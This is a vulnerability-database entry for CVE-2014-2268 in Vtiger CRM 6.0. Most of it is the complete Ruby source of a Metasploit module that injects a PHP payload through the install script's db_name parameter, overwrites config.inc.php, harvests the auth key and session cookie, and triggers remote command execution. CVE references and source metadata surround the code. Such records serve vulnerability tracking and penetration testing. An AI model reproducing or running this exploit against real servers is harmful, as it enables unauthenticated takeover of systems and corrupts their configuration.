ID

VAR-E-201404-0249


CVE

cve_id:CVE-2014-2268

Trust: 3.0

sources: BID: 66758 // PACKETSTORM: 126067 // EXPLOIT-DB: 32794 // EDBNET: 54307 // EDBNET: 21853

EDB ID

32794


TITLE

Vtiger - 'Install' Remote Command Execution (Metasploit) - PHP remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 32794

DESCRIPTION

Vtiger - 'Install' Remote Command Execution (Metasploit). CVE-2014-2268CVE-105641 . remote exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 32794

AFFECTED PRODUCTS

vendor:vtigermodel: - scope: - version: -

Trust: 1.0

vendor:vtigermodel:install unauthenticated remotescope: - version: -

Trust: 0.5

vendor:vtigermodel:crmscope:eqversion:6.0

Trust: 0.3

sources: BID: 66758 // PACKETSTORM: 126067 // EXPLOIT-DB: 32794

EXPLOIT

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

# Application database configuration is overwritten
Rank = ManualRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Vtiger Install Unauthenticated Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
Vtiger install script. This module is set to ManualRanking due to this
module overwriting the target database configuration, which may result in
a broken web app, and you may not be able to get a session again.
},
'Author' =>
[
'Jonathan Borgeaud < research[at]navixia.com >' # Navixia Research Team
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-2268' ],
[ 'URL', 'https://www.navixia.com/blog/entry/navixia-find-critical-vulnerabilities-in-vtiger-crm-cve-2014-2268-cve-2014-2269.html'],
[ 'URL', 'http://vtiger-crm.2324883.n4.nabble.com/Vtigercrm-developers-IMP-forgot-password-and-re-installation-security-fix-tt9786.html'],

],
'Privileged' => false,
'Platform' => ['php'],
'Payload' =>
{
'Space' => 4000,
'BadChars' => "#",
'DisableNops' => true,
'Keys' => ['php']
},
'Arch' => ARCH_PHP,
'Targets' => [[ 'Vtiger 6.0.0 or older', { }]],
'DisclosureDate' => 'Mar 5 2014',
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Vtiger', '/'])
], self.class)
end

def exploit
print_status("Injecting payload...")
rand_arg = Rex::Text.rand_text_hex(10)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'headers' => {'X-Requested-With' => rand_text_alpha(5)},
'vars_get' => {
'module' => 'Install',
'view' => 'Index',
'mode' => 'Step5',
'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // "
}})

# Check timeout
if not res
print_error("Request timed out, please try again")
return
end

if res.body =~ /name="auth_key"\s+value=".*?((?:[a-z0-9]*))"/i
authkey = $1
phpsessid = res.get_cookies

if authkey.blank?
print_error("No AuthKey found")
return
elsif phpsessid.blank?
print_error("No PHP Session ID found")
return
end

print_status("Retrieved Authkey : #{authkey}")
print_status("Retrieved PHPSESSID : #{phpsessid}")

send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'headers' => {'X-Requested-With' => rand_text_alpha(5)},
'cookie' => phpsessid,
'vars_get' =>
{
'module' => 'Install',
'view' => 'Index',
'mode' => 'Step7',
'auth_key' => authkey
}
})

print_status("Executing payload...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'config.inc.php'),
'vars_get' => { rand_arg => '1' }
})
else
print_error("No auth_key pattern found")
end
end
end

Trust: 1.0

sources: EXPLOIT-DB: 32794

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 32794

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 32794

TYPE

'Install' Remote Command Execution (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 32794

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:web

Trust: 0.5

tag:arbitrary

Trust: 0.5

sources: PACKETSTORM: 126067 // EXPLOIT-DB: 32794

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 32794

EXTERNAL IDS

db:NVDid:CVE-2014-2268

Trust: 3.0

db:EXPLOIT-DBid:32794

Trust: 1.6

db:EDBNETid:54307

Trust: 0.6

db:0DAYTODAYid:22116

Trust: 0.6

db:EDBNETid:21853

Trust: 0.6

db:PACKETSTORMid:126067

Trust: 0.5

db:BIDid:66758

Trust: 0.3

sources: BID: 66758 // PACKETSTORM: 126067 // EXPLOIT-DB: 32794 // EDBNET: 54307 // EDBNET: 21853

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-2268

Trust: 2.7

url:https://www.exploit-db.com/exploits/32794/

Trust: 0.6

url:https://0day.today/exploits/22116

Trust: 0.6

url:http://vtiger-crm.2324883.n4.nabble.com/vtigercrm-developers-imp-forgot-password-and-re-installation-security-fix-tt9786.html

Trust: 0.3

url:https://www.navixia.com/blog/entry/navixia-find-critical-vulnerabilities-in-vtiger-crm-cve-2014-2268-cve-2014-2269.html

Trust: 0.3

url:http://www.vtiger.com/

Trust: 0.3

sources: BID: 66758 // PACKETSTORM: 126067 // EXPLOIT-DB: 32794 // EDBNET: 54307 // EDBNET: 21853

SOURCES

db:BIDid:66758
db:PACKETSTORMid:126067
db:EXPLOIT-DBid:32794
db:EDBNETid:54307
db:EDBNETid:21853

LAST UPDATE DATE

2022-07-27T09:24:42.184000+00:00


SOURCES UPDATE DATE

db:BIDid:66758date:2014-04-10T00:00:00

SOURCES RELEASE DATE

db:BIDid:66758date:2014-04-10T00:00:00
db:PACKETSTORMid:126067date:2014-04-08T22:54:26
db:EXPLOIT-DBid:32794date:2014-04-10T00:00:00
db:EDBNETid:54307date:2014-04-10T00:00:00
db:EDBNETid:21853date:2014-04-09T00:00:00